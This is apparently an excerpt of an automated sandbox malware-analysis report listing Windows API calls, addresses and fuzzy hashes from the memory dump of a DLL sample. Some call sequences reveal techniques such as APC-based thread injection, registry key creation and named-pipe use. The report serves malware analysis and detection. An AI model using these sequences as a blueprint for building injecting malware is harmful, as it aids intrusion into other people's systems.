                • lstrlen.KERNEL32(04C9BFB0,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000), ref: 046D795E
                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000), ref: 046D796D
                • lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000), ref: 046D797A
                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 046D7992
                • lstrlen.KERNEL32(0000000D,00000000,00000000,00000000,00000000,00000000,00000000), ref: 046D799E
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 046D79BA
                • wsprintfA.USER32 ref: 046D7A9C
                • memcpy.NTDLL(00000000,?,?), ref: 046D7AE9
                • InterlockedExchange.KERNEL32(046EE1A8,00000000), ref: 046D7B07
                • HeapFree.KERNEL32(00000000,00000000), ref: 046D7B48
                  • Part of subcall function 046D265B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 046D2684
                  • Part of subcall function 046D265B: memcpy.NTDLL(00000000,?,?), ref: 046D2697
                  • Part of subcall function 046D265B: RtlEnterCriticalSection.NTDLL(046EE4A8), ref: 046D26A8
                  • Part of subcall function 046D265B: RtlLeaveCriticalSection.NTDLL(046EE4A8), ref: 046D26BD
                  • Part of subcall function 046D265B: HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 046D26F5
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: lstrlen$Heap$AllocateCriticalFreeSectionmemcpy$EnterExchangeInterlockedLeavewsprintf
                • String ID:
                • API String ID: 4198405257-0
                • Opcode ID: 66f55e1ab322c2195406f22e8481d49a091fd261bbe0790a1d6e165705f0e781
                • Instruction ID: 82836cdbb520adf644b4d386a7a31873f184a4eac3a4946404738e72848a3096
                • Opcode Fuzzy Hash: 66f55e1ab322c2195406f22e8481d49a091fd261bbe0790a1d6e165705f0e781
                • Instruction Fuzzy Hash: 48615C71A0124AEFDF14DFA5DC88EAE7BE9EB08305F044069E8059B201F735AA55DF91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LoadLibraryA.KERNEL32(?,?,00000000,00000000,?,00000001,?,?,?,?,?,?,?,046C8D64,?), ref: 046CB9CF
                • TlsAlloc.KERNEL32(?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046CB9D9
                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046CBA02
                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046CBA10
                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046CBA1E
                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046CBA2C
                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046CBA3A
                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046CBA48
                • ___HrLoadAllImportsForDll@4.DELAYIMP ref: 046CBA72
                • HeapFree.KERNEL32(00000000,00000000,00000000,?,0000000C,00000000,?,?,?,?,?,?,?,?,046C8D64,?), ref: 046CBAF3
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Load$Library$AllocDll@4FreeHeapImports
                • String ID:
                • API String ID: 1792504554-0
                • Opcode ID: 6566dea7cc3ec9769f261428f8d3a5711d5839b28c7a12f10b55eaf6ee62e490
                • Instruction ID: fe0b470ebdd100d997377218ed41c66548154f14fb69969034337024813faf19
                • Opcode Fuzzy Hash: 6566dea7cc3ec9769f261428f8d3a5711d5839b28c7a12f10b55eaf6ee62e490
                • Instruction Fuzzy Hash: 53414C71E0020AEFDB10DFAAE985DA977E8EB08704B1454AAE504DB241F73AFD45CF51
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 046E515E
                  • Part of subcall function 046C4B8D: RegCloseKey.ADVAPI32(?,?,?,046E5181,00000000,00000000,00000000), ref: 046C4C14
                • lstrcmpiW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 046E518D
                • lstrlenW.KERNEL32(00000000,00000000,00000000,00000000), ref: 046E519E
                • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 046E51D8
                • RegCloseKey.ADVAPI32(?), ref: 046E5203
                • RtlEnterCriticalSection.NTDLL(00000000), ref: 046E5219
                • HeapFree.KERNEL32(00000000,?), ref: 046E522E
                • RtlLeaveCriticalSection.NTDLL(00000000), ref: 046E5242
                • HeapFree.KERNEL32(00000000,?), ref: 046E5257
                • RegCloseKey.ADVAPI32(?), ref: 046E5260
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Close$CriticalFreeHeapSection$CreateEnterLeaveOpenlstrcmpilstrlen
                • String ID:
                • API String ID: 4138089493-0
                • Opcode ID: b12cd726ab1a58a91337b40f7f97ed63ac3ba78ea409f0c004817299b02dfd93
                • Instruction ID: 09bcb36f2d0f52d3356d89522fff94b0affb5744c8606a51aebf4595452d5e42
                • Opcode Fuzzy Hash: b12cd726ab1a58a91337b40f7f97ed63ac3ba78ea409f0c004817299b02dfd93
                • Instruction Fuzzy Hash: BE317571A01109FFCB12AFA6DC48DAE7BF9EB48304B144065F506EB121F736AE45DB60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046D0C78: memset.NTDLL ref: 046D0C9A
                  • Part of subcall function 046D0C78: CloseHandle.KERNEL32(?,?,?,?,?), ref: 046D0D44
                • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 046E4035
                • CloseHandle.KERNEL32(?), ref: 046E4041
                • PathFindFileNameW.SHLWAPI(?), ref: 046E4051
                • lstrlenW.KERNEL32(00000000), ref: 046E405B
                • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 046E406C
                • wcstombs.NTDLL ref: 046E407D
                • lstrlen.KERNEL32(?), ref: 046E408A
                • UnmapViewOfFile.KERNEL32(?,?,?,?,00000001), ref: 046E40C9
                • HeapFree.KERNEL32(00000000,00000000), ref: 046E40DB
                • DeleteFileW.KERNEL32(?), ref: 046E40E9
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: File$CloseHandleHeapViewlstrlen$AllocateDeleteFindFreeNamePathUnmapmemsetwcstombs
                • String ID:
                • API String ID: 2256351002-0
                • Opcode ID: a35cd557c1b00cb13ccdec95034b9bf13944938c26b34ca8edf3095ca77eafc9
                • Instruction ID: 9edaa365ac31565aa7772624b5796ab6bd1b4f9d5075172e6d71ceafa6bcd288
                • Opcode Fuzzy Hash: a35cd557c1b00cb13ccdec95034b9bf13944938c26b34ca8edf3095ca77eafc9
                • Instruction Fuzzy Hash: 6C311A75901109EFCF21AFA6DC88CAE7BB9FF44345F004469FA01A7210EB359E65DB60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetTickCount.KERNEL32 ref: 046E2459
                • CreateFileW.KERNEL32(046DA7DD,80000000,00000003,046EE268,00000003,00000000,00000000,?,046DA7DD,00000000,?,046C78A1,00000000), ref: 046E2476
                • GetLastError.KERNEL32(?,046DA7DD,00000000,?,046C78A1,00000000), ref: 046E251E
                  • Part of subcall function 046E41CF: lstrlen.KERNEL32(?,00000000,046E249E,00000027,046EE268,?,00000000,?,?,046E249E,?,00000001,?,046DA7DD,00000000,?), ref: 046E4205
                  • Part of subcall function 046E41CF: lstrcpy.KERNEL32(00000000,00000000), ref: 046E4229
                  • Part of subcall function 046E41CF: lstrcat.KERNEL32(00000000,00000000), ref: 046E4231
                • GetFileSize.KERNEL32(046DA7DD,00000000,?,00000001,?,046DA7DD,00000000,?,046C78A1,00000000), ref: 046E24A9
                • CreateFileMappingA.KERNEL32(046DA7DD,046EE268,00000002,00000000,00000000,046DA7DD), ref: 046E24BD
                • lstrlen.KERNEL32(046DA7DD,?,046DA7DD,00000000,?,046C78A1,00000000), ref: 046E24D9
                • lstrcpy.KERNEL32(?,046DA7DD), ref: 046E24E9
                • GetLastError.KERNEL32(?,046DA7DD,00000000,?,046C78A1,00000000), ref: 046E24F1
                • HeapFree.KERNEL32(00000000,046DA7DD,?,046DA7DD,00000000,?,046C78A1,00000000), ref: 046E2504
                • CloseHandle.KERNEL32(046DA7DD,?,00000001,?,046DA7DD), ref: 046E2516
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: File$CreateErrorLastlstrcpylstrlen$CloseCountFreeHandleHeapMappingSizeTicklstrcat
                • String ID:
                • API String ID: 194907169-0
                • Opcode ID: 2e5de862c43ee32aeb747bb2f34816811963eaf6e7b3f3ed3a0e34bd514780bd
                • Instruction ID: 827caea17dd5d38a3854c24b7559d28e9dd0acd8fae7a131ce64fe72375fbc60
                • Opcode Fuzzy Hash: 2e5de862c43ee32aeb747bb2f34816811963eaf6e7b3f3ed3a0e34bd514780bd
                • Instruction Fuzzy Hash: 31212B71901209FFDB10AFA6D848AAEBFF9EB04351F108069F505EB250E7359E44DF60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CloseHandle.KERNEL32(00000001,?,00000000,00000000,00000000,00000000,00000000,74E5F5B0,046D47CC,?,00000001), ref: 046E094F
                • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 046E095B
                • GetModuleHandleA.KERNEL32(?,04C9978E,?,00000000,00000000), ref: 046E097B
                • GetProcAddress.KERNEL32(00000000), ref: 046E0982
                • Thread32First.KERNEL32(00000001,0000001C), ref: 046E0992
                • OpenThread.KERNEL32(001F03FF,00000000,00000000), ref: 046E09AD
                • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 046E09BE
                • CloseHandle.KERNEL32(00000000), ref: 046E09C5
                • Thread32Next.KERNEL32(00000001,0000001C), ref: 046E09CE
                • CloseHandle.KERNEL32(00000001), ref: 046E09DA
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Handle$Close$Thread32$AddressCreateFirstModuleNextOpenProcQueueSnapshotThreadToolhelp32User
                • String ID:
                • API String ID: 2341152533-0
                • Opcode ID: e3075e6c109cc6c47c235c78827e6acf439277259b0a6d0583c32b84a4b58d8f
                • Instruction ID: 78a3c57389bf140460db2f30b91f97c9a9fe4effe6d61edc10d94499c57c5985
                • Opcode Fuzzy Hash: e3075e6c109cc6c47c235c78827e6acf439277259b0a6d0583c32b84a4b58d8f
                • Instruction Fuzzy Hash: F5214D72901119EFEF00AFA6DC84DFE7BF9EB08355B04512AF601AB150E775A9418B61
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SetEvent.KERNEL32(?,?,046CCE97), ref: 046D1D70
                  • Part of subcall function 046D810B: InterlockedExchange.KERNEL32(?,000000FF), ref: 046D8112
                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,046CCE97), ref: 046D1D90
                • CloseHandle.KERNEL32(00000000,?,046CCE97), ref: 046D1D99
                • CloseHandle.KERNEL32(?,?,?,046CCE97), ref: 046D1DA3
                • RtlEnterCriticalSection.NTDLL(?), ref: 046D1DAB
                • RtlLeaveCriticalSection.NTDLL(?), ref: 046D1DC3
                • Sleep.KERNEL32(000001F4), ref: 046D1DD2
                • CloseHandle.KERNEL32(?), ref: 046D1DDF
                • LocalFree.KERNEL32(?), ref: 046D1DEA
                • RtlDeleteCriticalSection.NTDLL(?), ref: 046D1DF4
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CloseCriticalHandleSection$DeleteEnterEventExchangeFreeInterlockedLeaveLocalObjectSingleSleepWait
                • String ID:
                • API String ID: 1408595562-0
                • Opcode ID: 4061952765b64dc707b8876abcae6791bd07bdc26cc2d19759c96de598ec99d0
                • Instruction ID: e3e532219e5be210fc3cff5d51d1d3f318537a27979a8ccaf510e0b4ff50cbb9
                • Opcode Fuzzy Hash: 4061952765b64dc707b8876abcae6791bd07bdc26cc2d19759c96de598ec99d0
                • Instruction Fuzzy Hash: A3115A31A40716EFDB20AB66DC48A9BB7F9FF557413040919F69397610FB7AF8008B64
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlen.KERNEL32(00000001,00000000,?,?,046CBD83,?,00000001,?,?,?), ref: 046D3756
                • lstrlen.KERNEL32(?), ref: 046D3766
                • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 046D379A
                • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 046D37C5
                • memcpy.NTDLL(00000000,?,?), ref: 046D37E4
                • HeapFree.KERNEL32(00000000,00000000), ref: 046D3845
                • memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 046D3867
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$Allocatelstrlenmemcpy$Free
                • String ID: W
                • API String ID: 3204852930-655174618
                • Opcode ID: aaa3a77c5030f1ec0ce768b7896e4b08374e9505e51bff40ef718e8e582c88d9
                • Instruction ID: 9c76128ba90fccc664737e48adce03729ed60380e03b86e86dc48fa289beec46
                • Opcode Fuzzy Hash: aaa3a77c5030f1ec0ce768b7896e4b08374e9505e51bff40ef718e8e582c88d9
                • Instruction Fuzzy Hash: E54114B2D00209EFDF11DF95CC84AAE7BB9EF14344F148469ED05A7310F735AA949BA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlen.KERNEL32(046C1127,?,00000000,00000000,046C2C06,00000011,046C1127,00000001,00000000,?,-00000008,?,046C1127,00000000,?,?), ref: 046CB853
                • RtlAllocateHeap.NTDLL(00000000,-00000008,?), ref: 046CB869
                • memcpy.NTDLL(00000010,?,00000000), ref: 046CB89F
                • memcpy.NTDLL(00000010,00000000,?), ref: 046CB8BA
                • CallNamedPipeA.KERNEL32(00000000,-00000008,?,00000010,00000028,00000001), ref: 046CB8D8
                • GetLastError.KERNEL32 ref: 046CB8E2
                • HeapFree.KERNEL32(00000000,00000000), ref: 046CB905
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heapmemcpy$AllocateCallErrorFreeLastNamedPipelstrlen
                • String ID: (
                • API String ID: 2237239663-3887548279
                • Opcode ID: 992e896ed01eee2b164f9eed1e50e995cbd0fe03af65c1879e0a9af76c3adcfa
                • Instruction ID: ea8cc8a5f16726a64a0d9e24d2aad43437acf2516b65c4dfe9a19d60748de835
                • Opcode Fuzzy Hash: 992e896ed01eee2b164f9eed1e50e995cbd0fe03af65c1879e0a9af76c3adcfa
                • Instruction Fuzzy Hash: A9318136901309EFDB20DFA6E845AAB7BB8EF44750F004439FD05D7250F235AA55DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,?), ref: 046E59E4
                • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 046E5A9C
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • LoadLibraryA.KERNEL32(00000000,?,?,?,?), ref: 046E5A32
                • GetProcAddress.KERNEL32(00000000,?), ref: 046E5A4B
                • GetLastError.KERNEL32(?,?,?,?), ref: 046E5A6A
                • FreeLibrary.KERNEL32(00000000,?,?,?,?), ref: 046E5A7C
                • GetLastError.KERNEL32(?,?,?,?), ref: 046E5A84
                Strings
                • Software\Microsoft\WAB\DLLPath, xrefs: 046E59D5
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: ErrorLastLibrary$AddressAllocateCloseFreeHeapLoadOpenProc
                • String ID: Software\Microsoft\WAB\DLLPath
                • API String ID: 1628847533-3156921957
                • Opcode ID: f23806f20913169eed57bc02df41097083cea17361bd3450b1357946927b71e1
                • Instruction ID: 7c219b2b953fd6a77ea40379405262c3e65d5f038054172437f87c2b3a21d903
                • Opcode Fuzzy Hash: f23806f20913169eed57bc02df41097083cea17361bd3450b1357946927b71e1
                • Instruction Fuzzy Hash: 9E219771902115FFCB21AFEADC88CBEBBF8EB84754B140155F902AB110F6755D41EB60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlAllocateHeap.NTDLL ref: 046CC61A
                • memset.NTDLL ref: 046CC62E
                  • Part of subcall function 046CBC31: RegQueryValueExA.KERNELBASE(?,046DE5BD,00000000,046DE5BD,00000000,046D6019,00000003,00000000,?,00000000,?,046DE5BD,046DE5BD,?,046D6019,00000000), ref: 046CBC69
                  • Part of subcall function 046CBC31: RtlAllocateHeap.NTDLL(00000000,046D6019), ref: 046CBC7D
                  • Part of subcall function 046CBC31: RegQueryValueExA.ADVAPI32(?,046DE5BD,00000000,046DE5BD,00000000,046D6019,?,046D6019,00000000,046DE5BD,?,?,?,046DE5BD,?), ref: 046CBC97
                  • Part of subcall function 046CBC31: RegCloseKey.ADVAPI32(?,?,046D6019,00000000,046DE5BD,?,?,?,046DE5BD,?,?,?,00000000,?,?,?), ref: 046CBCC1
                • GetCurrentThreadId.KERNEL32 ref: 046CC6BB
                • GetCurrentThread.KERNEL32 ref: 046CC6CE
                • RtlEnterCriticalSection.NTDLL(04C9C0A0), ref: 046CC775
                • Sleep.KERNEL32(0000000A), ref: 046CC77F
                • RtlLeaveCriticalSection.NTDLL(04C9C0A0), ref: 046CC7A5
                • HeapFree.KERNEL32(00000000,?), ref: 046CC7D3
                • HeapFree.KERNEL32(00000000,00000018), ref: 046CC7E6
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$AllocateCriticalCurrentFreeQuerySectionThreadValue$CloseEnterLeaveSleepmemset
                • String ID:
                • API String ID: 1146182784-0
                • Opcode ID: 41da4611887a50066ecde44b0de82cac6f0a7eb8cad02d6a861cdebfdb0a7389
                • Instruction ID: 069402c748243dd8dfced44d26e6c4e0935f4863c5c7f1c1e9a0d10c47094e20
                • Opcode Fuzzy Hash: 41da4611887a50066ecde44b0de82cac6f0a7eb8cad02d6a861cdebfdb0a7389
                • Instruction Fuzzy Hash: 555106B5504301AFE750DF29D88486ABBE8FB99344F00592EF588DB210F735ED498FA2
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046D20E3: RtlEnterCriticalSection.NTDLL(046EE4A8), ref: 046D20EB
                  • Part of subcall function 046D20E3: RtlLeaveCriticalSection.NTDLL(046EE4A8), ref: 046D2100
                  • Part of subcall function 046D20E3: InterlockedIncrement.KERNEL32(0000001C), ref: 046D2119
                • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 046C8B19
                • memset.NTDLL ref: 046C8B2A
                • lstrcmpi.KERNEL32(046C158F,?), ref: 046C8B6A
                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 046C8B96
                • memcpy.NTDLL(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,046DCD0D), ref: 046C8BAA
                • memset.NTDLL ref: 046C8BB7
                • memcpy.NTDLL(-00000004,046C158F,00000000,00000000,00000000,046C158F,00000000,00000000,00000000,?,00000000), ref: 046C8BD0
                • memcpy.NTDLL(-00000005,?,00000007,-00000004,046C158F,00000000,00000000,00000000,046C158F,00000000,00000000,00000000,?,00000000), ref: 046C8BF3
                • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,046DCD0D), ref: 046C8C10
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heapmemcpy$AllocateCriticalSectionmemset$EnterFreeIncrementInterlockedLeavelstrcmpi
                • String ID:
                • API String ID: 694413484-0
                • Opcode ID: 28a68541d3db255ea6ef86e582bb2caca80803d3c73294d24176f8f8ea9164ed
                • Instruction ID: a50e2794f8ca7e183380787408058f4290d2302dc6cee773763179e634e4cdd8
                • Opcode Fuzzy Hash: 28a68541d3db255ea6ef86e582bb2caca80803d3c73294d24176f8f8ea9164ed
                • Instruction Fuzzy Hash: 2C417EB1E00209EFDB20EFA5CC84EADBBB9EB14355F14446DE905A7250F735AE458B60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,00000022,00000000), ref: 046E29C4
                • lstrlen.KERNEL32(?), ref: 046E29CC
                • lstrlen.KERNEL32(?), ref: 046E2A37
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 046E2A62
                • memcpy.NTDLL(00000000,00000002,?), ref: 046E2A73
                • memcpy.NTDLL(00000000,?,?), ref: 046E2A89
                • memcpy.NTDLL(00000000,?,?,00000000,?,?), ref: 046E2A9B
                • memcpy.NTDLL(00000000,046E83F8,00000002,00000000,?,?,00000000,?,?), ref: 046E2AAE
                • memcpy.NTDLL(00000000,?,00000002), ref: 046E2AC3
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: memcpy$lstrlen$AllocateHeap
                • String ID:
                • API String ID: 3386453358-0
                • Opcode ID: 9bd5ba262669075ac9aaeca38c0f19d634fae0e4aa5f06ba37f31fade11f44bd
                • Instruction ID: b18d440dfe258317100faee1b60d84bd5e346a8ca4e80b1872548631d0465d6d
                • Opcode Fuzzy Hash: 9bd5ba262669075ac9aaeca38c0f19d634fae0e4aa5f06ba37f31fade11f44bd
                • Instruction Fuzzy Hash: AE413B72D0120DEFCF10DFA9CC84AAEBBB9EF58214F144455ED05A7200F771AA50DB90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046D20E3: RtlEnterCriticalSection.NTDLL(046EE4A8), ref: 046D20EB
                  • Part of subcall function 046D20E3: RtlLeaveCriticalSection.NTDLL(046EE4A8), ref: 046D2100
                  • Part of subcall function 046D20E3: InterlockedIncrement.KERNEL32(0000001C), ref: 046D2119
                • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 046E2D69
                • lstrlen.KERNEL32(00000008,?,?,?,046C110F,00000000,00000000,-00000008,?,?), ref: 046E2D78
                • RtlAllocateHeap.NTDLL(00000000,-00000021), ref: 046E2D8A
                • HeapFree.KERNEL32(00000000,00000000,?,?,?,046C110F,00000000,00000000,-00000008,?,?), ref: 046E2D9A
                • memcpy.NTDLL(00000000,?,?,?,?,?,046C110F,00000000,00000000,-00000008,?,?), ref: 046E2DAC
                • lstrcpy.KERNEL32(00000020), ref: 046E2DDE
                • RtlEnterCriticalSection.NTDLL(046EE4A8), ref: 046E2DEA
                • RtlLeaveCriticalSection.NTDLL(046EE4A8), ref: 046E2E42
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CriticalSection$Heap$AllocateEnterLeave$FreeIncrementInterlockedlstrcpylstrlenmemcpy
                • String ID:
                • API String ID: 3746371830-0
                • Opcode ID: 07424dc7ffadbc0a87d290089b479d6e4146bea7f543e7db71851dea5dcab41a
                • Instruction ID: 06b984bdbf24dfa5dd44fb7ced0befe3ab2875098f297ebc3a4fb9f24be2d7be
                • Opcode Fuzzy Hash: 07424dc7ffadbc0a87d290089b479d6e4146bea7f543e7db71851dea5dcab41a
                • Instruction Fuzzy Hash: 1541A771901319EFEB219F26C854B6ABBF9FF18711F008469E8099B240F776E954CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046C3CBC: RtlAllocateHeap.NTDLL(00000000,?), ref: 046C3CEE
                  • Part of subcall function 046C3CBC: HeapFree.KERNEL32(00000000,00000000,?,?,046D5EA7,?,00000022), ref: 046C3D13
                  • Part of subcall function 046C6652: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000000,?,046C8431,?,?,?,?,?,00000022,00000000), ref: 046C668E
                  • Part of subcall function 046C6652: HeapFree.KERNEL32(00000000,00000000,00000000,00000001,?,046C8431,?,?,?,?,?,00000022,00000000), ref: 046C66E1
                • lstrlen.KERNEL32(00000000,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000), ref: 046C8466
                • lstrlen.KERNEL32(?,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000), ref: 046C846E
                • lstrlen.KERNEL32(?), ref: 046C8478
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 046C848D
                • wsprintfA.USER32 ref: 046C84C9
                • HeapFree.KERNEL32(00000000,00000000,0000002D,00000000,00000000,00000000), ref: 046C84E8
                • HeapFree.KERNEL32(00000000,?), ref: 046C84FD
                • HeapFree.KERNEL32(00000000,?), ref: 046C850A
                • HeapFree.KERNEL32(00000000,00000000,?,0000001C,?,?,?,?,?,00000022,00000000), ref: 046C8518
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$Free$lstrlen$Allocate$wsprintf
                • String ID:
                • API String ID: 168057987-0
                • Opcode ID: d2e44ff4ab4e21c71a17dcc9ff699ceab3f8dff7dad5f734ac920c956fb9ce58
                • Instruction ID: f066bf9ae36b46d061ae4ff763df71b25ca91e086285440162d4b39a6735c93e
                • Opcode Fuzzy Hash: d2e44ff4ab4e21c71a17dcc9ff699ceab3f8dff7dad5f734ac920c956fb9ce58
                • Instruction Fuzzy Hash: 8A31AD31600315AFEB21AF65DC40E6BBBE8EF84314F00482EF944A7251E775EC188BA6
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,00000000,046E4FFC), ref: 046E373F
                • GetLastError.KERNEL32 ref: 046E3749
                • WaitForSingleObject.KERNEL32(000000C8), ref: 046E376E
                • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 046E378F
                • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 046E37B7
                • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 046E37CC
                • SetEndOfFile.KERNEL32(00000006), ref: 046E37D9
                • GetLastError.KERNEL32 ref: 046E37E5
                • CloseHandle.KERNEL32(00000006), ref: 046E37F1
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: File$CreateErrorLast$CloseHandleObjectPointerSingleWaitWrite
                • String ID:
                • API String ID: 2864405449-0
                • Opcode ID: 928557b63724b2babb8bd3d9fc50ee3664bed90131cab6a11c4e1a3571351b50
                • Instruction ID: 12a3515cd75863866a04513a07d05ffc24b624e91076791f9350beb8a1937f93
                • Opcode Fuzzy Hash: 928557b63724b2babb8bd3d9fc50ee3664bed90131cab6a11c4e1a3571351b50
